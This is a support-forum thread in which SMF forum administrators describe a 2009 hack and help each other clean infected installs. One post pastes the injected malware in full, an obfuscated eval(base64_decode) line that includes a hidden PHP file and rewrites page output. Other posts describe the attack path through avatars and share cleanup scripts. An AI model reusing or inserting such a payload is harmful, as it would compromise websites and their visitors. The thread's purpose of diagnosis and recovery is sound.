News:

SMF 2.0.19 has been released! Please update. Read more.

Main Menu

Hacked, script injection

Started by vHawkeyev, May 01, 2009, 10:47:02 AM

Previous topic - Next topic

romper

Just to mention, I realized now, that yesterday, afte I deleted kris and removed all avatars and upgrade to 1.1.9. it worked, but today it doesn't, and nothing I upload shows on my server in attachment dir. So obviously I didn't clean everything. Please help

ConquerorOfMankind

Quoteand nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?

romper

Quote from: ConquerorOfMankind on May 22, 2009, 10:31:51 AM
Quoteand nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?

Yes....It worked yesterday.

romper

I just wanted to delete SMF gallery an unnistal failed in:
4.     Execute Modification     ./Sources/ManagePermissions.php     Test failed
5.    Execute Modification    ./Themes/default/index.template.php    Test failed

So I checked those 2 files, and saw this:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy92aG9zdHMvemJvcmlzdGUuY29tL2h0dHBkb2NzL2ZvcnVtL1RoZW1lcy9jbGFzc2ljL2ltYWdlcy9iYmMvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy92YXIvd3d3L3Zob3N0cy96Ym9yaXN0ZS5jb20vaHR0cGRvY3MvZm9ydW0vVGhlbWVzL2NsYXNzaWMvaW1hZ2VzL2JiYy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

But even when I delete that I can't uninstall gallery without tes failed.

Kindred

the failure of a mod to install has no bearing on the hack...     the test failed suggests that something has changed the code that the mod is looking for so that it can not automatically install. You will have to manually install the mod into those files.

Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

romper

Quote from: Kindred on May 22, 2009, 01:28:17 PM
the failure of a mod to install has no bearing on the hack...     the test failed suggests that something has changed the code that the mod is looking for so that it can not automatically install. You will have to manually install the mod into those files.

I'm trying to unistall....Problem is I see code (already mention here...eval base64...and so on) on more files, and I have a lot of mods installed. I was hoping that 1.1.9 will fix that, but now I'm not sure what to do?
Start deleting those lines manualy? Leave everything? Restore base? Delete everything and start over? (hope not)

Kindred

If you have a backup from before the attack, then use that... (if you don't, then I suggest that you start keeping one)

Otherwise, take the full install package of SMF 1.1.9, save the Settings.php file on your local computer and delete all PHP files from your forum directories.   The reload the forum files using the install package... delete the install files and copy your saved version of Settings.php (after making sure that it is clean)

You now have your forum reset to a clean state and you can re-apply mods as needed.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

ellion

#327
i just went through my DB to check for theme_dir entries and i found the follwoing entries.
 
249  32  theme_dir  ./attachments/avatar_249.gif\0
280 32 theme_dir ./attachments/avatar_280.jpg�
488 32 theme_dir ./attachments/avatar_488.jpg�

the first column of numbers are the member id the id 488 is kris barteo.

should i delete ethese entries?

Sarge

What are the names for the other IDs?

    Please do not PM me with support requests unless I invite you to.

http://www.zeriyt.com/   ~   http://www.galeriashqiptare.net/


Quote
<H> I had zero posts when I started posting


JBlaze

Jason Clemons
Former Team Member 2009 - 2012

Kindred

ok... rather than post a link to a spanish forum with a relatively useless comment, care to tell use what they claim the bug in 1.1.9 is?
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

FinsandFur

I've got another forum that he hit.
I scanned through most of what you folks got here, but couldn't bring myself to read all 17 pages :-\

Basically, I'm just bringing ya's some more info to the table.

The said forum was for a client I just took over the maintenance duties last week.
They were on 1.1.7 at the time of the hack, which was Jan18th, 09
The path he chose was relatively easy to follow looking at last modified dates through SSH.

He also added a php file to the Packages directory titled "tvax.php" that was heavily infected. I DO have that file zipped if anyone wants to analyze it.


Daniel15

Quote from: oakview on May 07, 2009, 01:59:12 AM
I'm a victim too, and took another route in preventing future attacks. First, I didn't have backups so I downloaded and cleaned the files using this Linux bash script with base64_encode as the search term. The script deletes that line entirely, leaving no white space:
#!/bin/bash
find /directory_name '*.php' -type f | while read FILE
do
sed -i '/base64_decode/ d' "$FILE"
done

This cleaned everything recursively, but I did have to replace one file that had a legit line with the search term in it (can't remember which one, but you'll know from the error it generates). Then I uploaded the clean files and was back in business. Took about an hour to do all this.

Thanks for the script, saved me a whole heap of time cleaning an infected forum. :)
Now to clean the random junk it left behind >_<
Daniel15, former Customisation team member, resigned due to lack of time. I still love everyone here :D.
Go to smfshop.com for SMFshop support, do NOT email or PM me!

agridoc

Altough I did some work with SHH commands, I finally cleaned my files by creating a zip file with SHH, containing all PHP files in my domain
zip -R filename '*.php'
Then cleaned them with Search & Replace Master, an excellent freeware tool, I really liked it, then FTP in my site.

It's useful to have a file with the injected code. See here how to use it for finding the directory with style.css.php and s.php
http://www.simplemachines.org/community/index.php?topic=307717.msg2060807#msg2060807
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

Ratiomaster

I've made a php script that will clean all infected files on your server (attached)
Just put it in the root directory and it will search and remove junk line from all php's recursively.

Btw, is there other problems caused by this hack ? Like does it install some backdoors that need to be removed as well ?

Dzonny

Really, that is very good work Ratiomaster...
Anyone fixed forum with this tool ??

romper

Quote from: Ratiomaster on May 24, 2009, 02:09:52 PM
I've made a php script that will clean all infected files on your server (attached)
Just put it in the root directory and it will search and remove junk line from all php's recursively.

Btw, is there other problems caused by this hack ? Like does it install some backdoors that need to be removed as well ?

Greattt! I'm clean now, but this will be on my reserves!!!

aly22

if I already deleted user kristabero how do I know if the avatar has been left behind please?

aly22

Anyone tried the cleanup script? I don't want to be skeptical, and it scans clean ... but with all I've cleaned up manually over the past week, I am timid of installing/running anything without some assurance it works. Thx

Advertisement: